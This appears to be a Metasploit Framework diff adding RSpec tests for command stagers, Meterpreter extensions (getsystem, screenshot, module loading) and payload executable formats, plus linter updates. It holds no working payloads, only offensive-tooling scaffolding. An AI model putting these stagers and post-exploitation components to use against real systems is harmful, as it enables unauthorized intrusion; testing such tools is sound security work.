   describe "#version" do
-    CURRENT_VERSION = "4.9.2-dev"
+    CURRENT_VERSION = "4.9.3-dev"
 
     subject do
       described_class.new
diff --git a/spec/lib/msf/ui/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/command_dispatcher/core_spec.rb
index 69693eb5b8..f83188c8cf 100644
--- a/spec/lib/msf/ui/command_dispatcher/core_spec.rb
+++ b/spec/lib/msf/ui/command_dispatcher/core_spec.rb
@@ -82,7 +82,7 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
         end
 
         it 'should have disclosure date in second column' do
-          cell(printed_table, 0, 1).should include(module_detail.disclosure_date.to_s)
+          cell(printed_table, 0, 1).should include(module_detail.disclosure_date.strftime("%Y-%m-%d"))
         end
 
         it 'should have rank name in third column' do
diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
index f5dde21917..52baca5d93 100644
--- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb
+++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb
@@ -221,25 +221,38 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
           "Usage: db_import <filename> [file2...]",
           "Filenames can be globs like *.xml, or **/*.xml which will search recursively",
           "Currently supported file types include:",
-          "    Acunetix XML",
+          "    Acunetix",
           "    Amap Log",
           "    Amap Log -m",
-          "    Appscan XML",
+          "    Appscan",
           "    Burp Session XML",
-          "    Foundstone XML",
+          "    CI",
+          "    Foundstone",
+          "    FusionVM XML",
+          "    IP Address List",
           "    IP360 ASPL",
           "    IP360 XML v3",
+          "    Libpcap Packet Capture",
+          "    Metasploit PWDump Export",
+          "    Metasploit XML",
+          "    Metasploit Zip Export",
           "    Microsoft Baseline Security Analyzer",
-          "    Nessus NBE",
-          "    Nessus XML (v1 and v2)",
-          "    NetSparker XML",
           "    NeXpose Simple XML",
           "    NeXpose XML Report",
+          "    Nessus NBE Report",
+          "    Nessus XML (v1)",
+          "    Nessus XML (v2)",
+          "    NetSparker XML",
+          "    Nikto XML",
           "    Nmap XML",
           "    OpenVAS Report",
+          "    OpenVAS XML",
+          "    Outpost24 XML",
           "    Qualys Asset XML",
           "    Qualys Scan XML",
-          "    Retina XML"
+          "    Retina XML",
+          "    Spiceworks CSV Export",
+          "    Wapiti XML"
         ]
       end
     end
diff --git a/spec/lib/rex/exploitation/cmdstager/base_spec.rb b/spec/lib/rex/exploitation/cmdstager/base_spec.rb
new file mode 100644
index 0000000000..7667ce19b9
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/base_spec.rb
@@ -0,0 +1,26 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerBase do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns nil" do
+      expect(cmd_stager.cmd_concat_operator).to be_nil
+    end
+  end
+
+  describe '#generate' do
+    it "returns an empty array" do
+      expect(cmd_stager.generate).to eq([])
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/bourne_spec.rb b/spec/lib/rex/exploitation/cmdstager/bourne_spec.rb
new file mode 100644
index 0000000000..0a072db8a9
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/bourne_spec.rb
@@ -0,0 +1,29 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerBourne do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns ;" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" ; ")
+    end
+  end
+
+  describe '#generate' do
+    it "returns an array of commands" do
+      result = cmd_stager.generate
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/debug_asm_spec.rb b/spec/lib/rex/exploitation/cmdstager/debug_asm_spec.rb
new file mode 100644
index 0000000000..06d53c477e
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/debug_asm_spec.rb
@@ -0,0 +1,35 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerDebugAsm do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns &" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" & ")
+    end
+  end
+
+  describe '#generate' do
+    let(:opts) do
+      {
+        :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")
+      }
+    end
+
+    it "returns an array of commands" do
+      result = cmd_stager.generate(opts)
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/debug_write_spec.rb b/spec/lib/rex/exploitation/cmdstager/debug_write_spec.rb
new file mode 100644
index 0000000000..b70e228ada
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/debug_write_spec.rb
@@ -0,0 +1,35 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerDebugWrite do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns &" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" & ")
+    end
+  end
+
+  describe '#generate' do
+    let(:opts) do
+      {
+        :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")
+      }
+    end
+
+    it "returns an array of commands" do
+      result = cmd_stager.generate(opts)
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/echo_spec.rb b/spec/lib/rex/exploitation/cmdstager/echo_spec.rb
new file mode 100644
index 0000000000..a3d91f2382
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/echo_spec.rb
@@ -0,0 +1,29 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerEcho do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns ;" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" ; ")
+    end
+  end
+
+  describe '#generate' do
+    it "returns an array of commands" do
+      result = cmd_stager.generate
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/printf_spec.rb b/spec/lib/rex/exploitation/cmdstager/printf_spec.rb
new file mode 100644
index 0000000000..02927f7ecb
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/printf_spec.rb
@@ -0,0 +1,29 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerPrintf do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns ;" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" ; ")
+    end
+  end
+
+  describe '#generate' do
+    it "returns an array of commands" do
+      result = cmd_stager.generate
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/tftp_spec.rb b/spec/lib/rex/exploitation/cmdstager/tftp_spec.rb
new file mode 100644
index 0000000000..813533fd4d
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/tftp_spec.rb
@@ -0,0 +1,29 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerTFTP do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns nil" do
+      expect(cmd_stager.cmd_concat_operator).to be_nil
+    end
+  end
+
+  describe '#generate' do
+    it "returns an array of commands" do
+      result = cmd_stager.generate
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/exploitation/cmdstager/vbs_spec.rb b/spec/lib/rex/exploitation/cmdstager/vbs_spec.rb
new file mode 100644
index 0000000000..9b30c4cceb
--- /dev/null
+++ b/spec/lib/rex/exploitation/cmdstager/vbs_spec.rb
@@ -0,0 +1,35 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerVBS do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns &" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" & ")
+    end
+  end
+
+  describe '#generate' do
+    let(:opts) do
+      {
+        :decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")
+      }
+    end
+
+    it "returns an array of commands" do
+      result = cmd_stager.generate(opts)
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end
diff --git a/spec/lib/rex/post/meterpreter/client_core_spec.rb b/spec/lib/rex/post/meterpreter/client_core_spec.rb
new file mode 100644
index 0000000000..ba65b92fdd
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter/client_core_spec.rb
@@ -0,0 +1,53 @@
+require 'spec_helper'
+require 'rex/post/meterpreter/client_core'
+
+describe Rex::Post::Meterpreter::ClientCore do
+
+  it "should be available" do
+    expect(described_class).to eq(Rex::Post::Meterpreter::ClientCore)
+  end
+
+  describe "#use" do
+
+    before(:each) do
+      @response = double("response")
+      allow(@response).to receive(:result) { 0 }
+      allow(@response).to receive(:each) { [:help] }
+      @client = double("client")
+      allow(@client).to receive(:binary_suffix) { "x64.dll" }
+      allow(@client).to receive(:capabilities) { {:ssl => false, :zlib => false } }
+      allow(@client).to receive(:response_timeout) { 1 }
+      allow(@client).to receive(:send_packet_wait_response) { @response }
+      allow(@client).to receive(:add_extension) { true }
+    end
+
+    let(:client_core) {described_class.new(@client)}
+    it 'should respond to #use' do
+      expect(client_core).to respond_to(:use)
+    end
+
+    context 'with a gemified module' do
+      let(:mod) {"kiwi"}
+      it 'should be available' do
+        expect(client_core.use(mod)).to be_true
+      end
+    end
+
+    context 'with a local module' do
+      let(:mod) {"sniffer"}
+      it 'should be available' do
+        expect(client_core.use(mod)).to be_true
+      end
+    end
+
+    context 'with a missing a module' do
+      let(:mod) {"eaten_by_av"}
+      it 'should be available' do
+        expect { client_core.use(mod) }.to raise_error(TypeError)
+      end
+    end
+
+
+  end
+  
+end
diff --git a/spec/lib/rex/post/meterpreter/extensions/priv/priv_spec.rb b/spec/lib/rex/post/meterpreter/extensions/priv/priv_spec.rb
new file mode 100644
index 0000000000..4d336b617d
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter/extensions/priv/priv_spec.rb
@@ -0,0 +1,41 @@
+require 'spec_helper'
+require 'rex/post/meterpreter/extension'
+require 'rex/post/meterpreter/extensions/priv/priv'
+
+describe Rex::Post::Meterpreter::Extensions::Priv::Priv do
+
+  it "should be available" do
+    expect(described_class).to eq(Rex::Post::Meterpreter::Extensions::Priv::Priv)
+  end
+
+  describe "#getsystem" do
+    before(:each) do
+      @client = double("client")
+      allow(@client).to receive(:register_extension_aliases) { [] }
+    end
+
+    let(:priv) {described_class.new(@client)}
+    it 'should respond to #getsystem' do
+      expect(priv).to respond_to(:getsystem)
+    end
+
+    it 'should return itself' do
+      expect(priv).to be_kind_of(described_class)
+    end
+
+    it 'should have some instance variables' do
+      expect(priv.instance_variables).to include(:@client)
+      expect(priv.instance_variables).to include(:@name)
+      expect(priv.instance_variables).to include(:@fs)
+    end
+
+    it 'should respond to fs' do
+      expect(priv).to respond_to(:fs)
+    end
+
+    it 'should have a name of priv' do
+      expect(priv.name).to eq("priv")
+    end
+
+  end
+end
diff --git a/spec/lib/rex/post/meterpreter/extensions/stdapi/ui_spec.rb b/spec/lib/rex/post/meterpreter/extensions/stdapi/ui_spec.rb
new file mode 100644
index 0000000000..e36c742a0a
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter/extensions/stdapi/ui_spec.rb
@@ -0,0 +1,33 @@
+require 'spec_helper'
+require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/extensions/stdapi/ui'
+
+describe Rex::Post::Meterpreter::Extensions::Stdapi::UI do
+
+  it "should be available" do
+    expect(described_class).to eq(Rex::Post::Meterpreter::Extensions::Stdapi::UI)
+  end
+
+  describe "#screenshot" do
+
+    before(:each) do
+      @client = double("client")
+    end
+
+    let(:ui) { described_class.new(@client) }
+    it 'should respond to #screenshot' do
+      expect(ui).to respond_to(:screenshot)
+    end
+
+    it 'should return itself' do
+      expect(ui).to be_kind_of(described_class)
+    end
+
+    it 'should have an instance variable' do
+      expect(ui.instance_variables).to include(:@client)
+    end
+
+  end
+
+end
+
diff --git a/spec/lib/rex/post/meterpreter/ui/console.rb b/spec/lib/rex/post/meterpreter/ui/console.rb
new file mode 100644
index 0000000000..bd0d7d76a4
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter/ui/console.rb
@@ -0,0 +1,27 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/post/meterpreter/ui/console'
+
+describe Rex::Post::Meterpreter::Ui::Console do
+
+  subject(:console) do
+    Rex::Post::Meterpreter::Ui::Console.new(nil)
+  end
+
+  describe "#run_command" do
+    let(:dispatcher) do
+      double
+    end
+
+    it "logs error when Rex::AddressInUse is raised" do
+      allow(dispatcher).to receive(:cmd_address_in_use) do
+        raise Rex::AddressInUse, "0.0.0.0:80"
+      end
+
+      expect(subject).to receive(:log_error).with("The address is already in use (0.0.0.0:80).")
+      subject.run_command(dispatcher, "address_in_use", nil)
+    end
+  end
+
+end
diff --git a/spec/lib/rex/post/meterpreter_spec.rb b/spec/lib/rex/post/meterpreter_spec.rb
new file mode 100644
index 0000000000..cf917d1032
--- /dev/null
+++ b/spec/lib/rex/post/meterpreter_spec.rb
@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'rex/post/meterpreter'
+
+describe MeterpreterBinaries do
+  it 'is available' do
+    expect(described_class).to eq(MeterpreterBinaries)
+  end
+end
diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb
index c76a9d2dee..14f13a776d 100644
--- a/spec/lib/rex/proto/http/client_request_spec.rb
+++ b/spec/lib/rex/proto/http/client_request_spec.rb
@@ -189,6 +189,9 @@ describe Rex::Proto::Http::ClientRequest do
         'foo[]'      => 'bar',
         'bar'        => 'baz',
         'frobnicate' => 'the froozle?',
+        'foshizzle'  => 'my/nizzle',
+        'asdf'       => nil,
+        'test'       => ''
       }
     end
 
@@ -215,6 +218,9 @@ describe Rex::Proto::Http::ClientRequest do
         str.should include("foo[]=bar")
         str.should include("bar=baz")
         str.should include("frobnicate=the froozle?")
+        str.should include("foshizzle=my/nizzle")
+        str.should include("asdf&")
+        str.should include("test=")
       end
     end
 
@@ -226,6 +232,20 @@ describe Rex::Proto::Http::ClientRequest do
           str.should include("foo%5b%5d=bar")
           str.should include("bar=baz")
           str.should include("frobnicate=the%20froozle%3f")
+          str.should include("foshizzle=my/nizzle")
+          str.should include("asdf&")
+          str.should include("test=")
+        end
+      end
+
+      context "and 'uri_encode_mode' = hex-noslashes" do
+        let(:encode_mode) { 'hex-noslashes' }
+        it "should encode all chars" do
+          str = client_request.to_s
+          str.should include("%66%6f%6f%5b%5d=%62%61%72")
+          str.should include("%62%61%72=%62%61%7a")
+          str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f")
+          str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79/%6e%69%7a%7a%6c%65")
         end
       end
 
@@ -236,6 +256,7 @@ describe Rex::Proto::Http::ClientRequest do
           str.should include("%66%6f%6f%5b%5d=%62%61%72")
           str.should include("%62%61%72=%62%61%7a")
           str.should include("%66%72%6f%62%6e%69%63%61%74%65=%74%68%65%20%66%72%6f%6f%7a%6c%65%3f")
+          str.should include("%66%6f%73%68%69%7a%7a%6c%65=%6d%79%2f%6e%69%7a%7a%6c%65")
         end
       end
 
diff --git a/spec/lib/rex/proto/http/response_spec.rb b/spec/lib/rex/proto/http/response_spec.rb
index dc474a0877..67c23c9588 100644
--- a/spec/lib/rex/proto/http/response_spec.rb
+++ b/spec/lib/rex/proto/http/response_spec.rb
@@ -116,6 +116,22 @@ describe Rex::Proto::Http::Response do
     HEREDOC
   end
 
+  def get_cookies_comma_separated
+    <<-HEREDOC.gsub(/^ {6}/, '')
+      HTTP/1.1 200 OK
+      Expires: Thu, 26 Oct 1978 00:00:00 GMT
+      Content-Length: 8556
+      Server: CherryPy/3.1.2
+      Date: Sun, 06 Jul 2014 20:09:28 GMT
+      Cache-Control: no-store, max-age=0, no-cache, must-revalidate
+      Content-Type: text/html;charset=utf-8
+      Set-Cookie: cval=880350187, session_id_8000=83466b1a1a7a27ce13d35f78155d40ca3a1e7a28; expires=Mon, 07 Jul 2014 20:09:28 GMT; httponly; Path=/, uid=348637C4-9B10-485A-BFA9-5E892432FCFD; expires=Fri, 05-Jul-2019 20:09:28 GMT
+
+      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+      <!--[if lt IE 7]> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:s="http://www.splunk.com/xhtml-extensions/1.0" xml:lang="en" lang="en" class="no-js lt-ie9 lt-ie8 lt-
+    HEREDOC
+  end
+
   def cookie_sanity_check(meth)
     resp = described_class.new()
     resp.parse(self.send meth)
@@ -185,6 +201,18 @@ describe Rex::Proto::Http::Response do
       cookies_array.should include(*expected_cookies)
     end
 
+    it 'parses comma separated cookies' do
+      cookies_array = cookie_sanity_check(:get_cookies_comma_separated)
+      cookies_array.count.should eq(3)
+      expected_cookies = %w{
+      cval=880350187
+      session_id_8000=83466b1a1a7a27ce13d35f78155d40ca3a1e7a28
+      uid=348637C4-9B10-485A-BFA9-5E892432FCFD
+      }
+      expected_cookies.shuffle!
+      cookies_array.should include(*expected_cookies)
+    end
+
   end
 
 end
diff --git a/spec/lib/rex/socket_spec.rb b/spec/lib/rex/socket_spec.rb
index 41c1abde79..fdf1610129 100644
--- a/spec/lib/rex/socket_spec.rb
+++ b/spec/lib/rex/socket_spec.rb
@@ -1,5 +1,6 @@
 # -*- coding:binary -*-
 require 'rex/socket/range_walker'
+require 'spec_helper'
 
 describe Rex::Socket do
 
@@ -163,4 +164,35 @@ describe Rex::Socket do
 
     end
   end
+
+  describe '.portspec_to_portlist' do
+
+    subject(:portlist) { described_class.portspec_to_portlist portspec_string}
+    let(:portspec_string) { '-1,0-10,!2-5,!7,65530-,65536' }
+
+    it 'does not include negative numbers' do
+      expect(portlist).to_not include '-1'
+    end
+
+    it 'does not include 0' do
+      expect(portlist).to_not include '0'
+    end
+
+    it 'does not include negated numbers' do
+      ['2', '3', '4', '5', '7'].each do |port|
+        expect(portlist).to_not include port
+      end
+    end
+
+    it 'does not include any numbers above 65535' do
+      expect(portlist).to_not include '65536'
+    end
+
+    it 'expands open ended ranges' do
+      (65530..65535).each do |port|
+        expect(portlist).to include port
+      end
+    end
+  end
+
 end
diff --git a/spec/support/shared/contexts/msf/util/exe.rb b/spec/support/shared/contexts/msf/util/exe.rb
index e1372a6492..c1b6ea5a92 100644
--- a/spec/support/shared/contexts/msf/util/exe.rb
+++ b/spec/support/shared/contexts/msf/util/exe.rb
@@ -36,8 +36,8 @@ shared_context 'Msf::Util::Exe' do
       { :format => "psh",  :arch => "x86_64", :file_fp => /ASCII/  },
       { :format => "psh-net",  :arch => "x86", :file_fp => /ASCII/  },
       { :format => "psh-net",  :arch => "x86_64", :file_fp => /ASCII/  },
-      { :format => "war",  :arch => "x86", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "x86_64", :file_fp => /zip/i  },
+      { :format => "war",  :arch => "x86", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "x86_64", :file_fp => /zip|jar/i  },
       { :format => "msi",  :arch => "x86", :file_fp => /(Composite Document)|(CDF V2 Document)/  },
       { :format => "msi",  :arch => "x64", :file_fp => /(Composite Document)|(CDF V2 Document)/  },
       { :format => "msi",  :arch => "x86_64", :file_fp => /(Composite Document)|(CDF V2 Document)/  },
@@ -51,29 +51,29 @@ shared_context 'Msf::Util::Exe' do
       { :format => "elf", :arch => "armle",  :file_fp => /ELF 32.*ARM/ },
       { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ },
       { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ },
-      { :format => "war",  :arch => "x86", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "x64", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "armle", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "mipsbe", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "mipsle", :file_fp => /zip/i  },
+      { :format => "war",  :arch => "x86", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "x64", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "armle", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "mipsbe", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "mipsle", :file_fp => /zip|jar/i  },
     ],
     "bsd" => [
       { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ },
-      { :format => "war",  :arch => "x86", :file_fp => /zip/i  },
+      { :format => "war",  :arch => "x86", :file_fp => /zip|jar/i  },
     ],
     "solaris" => [
       { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ },
-      { :format => "war",  :arch => "x86", :file_fp => /zip/i  },
+      { :format => "war",  :arch => "x86", :file_fp => /zip|jar/i  },
     ],
     "osx" => [
       { :format => "macho", :arch => "x86",   :file_fp => /Mach-O.*i386/  },
       { :format => "macho", :arch => "x64",   :file_fp => /Mach-O 64/     },
       { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ },
       { :format => "macho", :arch => "ppc",   :file_fp => /Mach-O.*ppc/   },
-      { :format => "war",  :arch => "x86", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "x64", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "armle", :file_fp => /zip/i  },
-      { :format => "war",  :arch => "ppc", :file_fp => /zip/i  },
+      { :format => "war",  :arch => "x86", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "x64", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "armle", :file_fp => /zip|jar/i  },
+      { :format => "war",  :arch => "ppc", :file_fp => /zip|jar/i  },
     ],
   }
 
diff --git a/tools/msftidy.rb b/tools/msftidy.rb
index 07fb8e4463..9e10b97300 100755
--- a/tools/msftidy.rb
+++ b/tools/msftidy.rb
@@ -11,6 +11,7 @@ require 'find'
 require 'time'
 
 CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES']
+SUPPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES']
 
 if CHECK_OLD_RUBIES
   require 'rvm'
@@ -30,6 +31,10 @@ class String
     "\e[1;32;40m#{self}\e[0m"
   end
 
+  def cyan
+    "\e[1;36;40m#{self}\e[0m"
+  end
+
   def ascii_only?
     self =~ Regexp.new('[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]', nil, 'n') ? false : true
   end
@@ -83,6 +88,14 @@ class Msftidy
     puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{cleanup_text(txt)}"
   end
 
+  #
+  # Display an info message. Info messages do not alter the exit status.
+  #
+  def info(txt, line=0)
+    return if SUPPRESS_INFO_MESSAGES
+    line_msg = (line>0) ? ":#{line}" : ''
+    puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}"
+  end
 
   ##
   #
@@ -102,16 +115,30 @@ class Msftidy
     end
   end
 
+  # Updated this check to see if Nokogiri::XML.parse is being called
+  # specifically. The main reason for this concern is that some versions
+  # of libxml2 are still vulnerable to XXE attacks. REXML is safer (and
+  # slower) since it's pure ruby. Unfortunately, there is no pure Ruby
+  # HTML parser (except Hpricot which is abandonware) -- easy checks
+  # can avoid Nokogiri (most modules use regex anyway), but more complex
+  # checks tends to require Nokogiri for HTML element and value parsing.
   def check_nokogiri
-    msg = "Requiring Nokogiri in modules can be risky, use REXML instead."
+    msg = "Using Nokogiri in modules can be risky, use REXML instead."
     has_nokogiri = false
+    has_nokogiri_xml_parser = false
     @source.each_line do |line|
-      if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/
-        has_nokogiri = true
-        break
+      if has_nokogiri
+        if line =~ /Nokogiri::XML\.parse/ or line =~ /Nokogiri::XML::Reader/
+          has_nokogiri_xml_parser = true
+          break
+        end
+      else
+        if line =~ /^\s*(require|load)\s+['"]nokogiri['"]/
+          has_nokogiri = true
+        end
       end
     end
-    error(msg) if has_nokogiri
+    error(msg) if has_nokogiri_xml_parser
   end
 
   def check_ref_identifiers
@@ -293,6 +320,15 @@ class Msftidy
     end
   end
 
+  # Explicitly skip this check if we're suppressing info messages
+  # anyway, since it takes a fair amount of time per module to perform.
+  def check_rubocop
+    return true if SUPPRESS_INFO_MESSAGES
+    out = %x{rubocop -n #{@full_filepath}}
+    ret = $?
+    info("Fails to pass Rubocop Ruby style guidelines (run 'rubocop #{@full_filepath}' to see violations)") unless ret.exitstatus == 0
+  end
+
   def check_old_rubies
     return true unless CHECK_OLD_RUBIES
     return true unless Object.const_defined? :RVM
@@ -460,13 +496,16 @@ class Msftidy
         error("Writes to stdout", idx)
       end
 
-      # do not change datastore in code
+      # You should not change datastore in code. For reasons. See
+      # RM#8498 for discussion, starting at comment #16:
+      #
+      # https://dev.metasploit.com/redmine/issues/8498#note-16
       if ln =~ /(?<!\.)datastore\[["'][^"']+["']\]\s*=(?![=~>])/
-        error("datastore is modified in code: #{ln}", idx)
+        info("datastore is modified in code: #{ln}", idx)
       end
 
-      # do not read Set-Cookie header
-      if ln =~ /\[['"]Set-Cookie['"]\]/i
+      # do not read Set-Cookie header (ignore commented lines)
+      if ln =~ /^(?!\s*#).+\[['"]Set-Cookie['"]\]/i
         warn("Do not read Set-Cookie header directly, use res.get_cookies instead: #{ln}", idx)
       end
 
@@ -485,14 +524,20 @@ class Msftidy
   end
 
   def check_vars_get
-    test = @source.scan(/send_request_(?:cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im)
+    test = @source.scan(/send_request_cgi\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im)
     unless test.empty?
       test.each { |item|
-        warn("Please use vars_get in send_request_cgi and send_request_raw: #{item}")
+        info("Please use vars_get in send_request_cgi: #{item}")
       }
     end
   end
 
+  def check_newline_eof
+    if @source !~ /(?:\r\n|\n)\z/m
+      info('Please add a newline at the end of the file')
+    end
+  end
+
   private
 
   def load_file(file)
@@ -537,6 +582,8 @@ def run_checks(full_filepath)
   tidy.check_comment_splat
   tidy.check_vuln_codes
   tidy.check_vars_get
+  tidy.check_newline_eof
+  tidy.check_rubocop
   return tidy
 end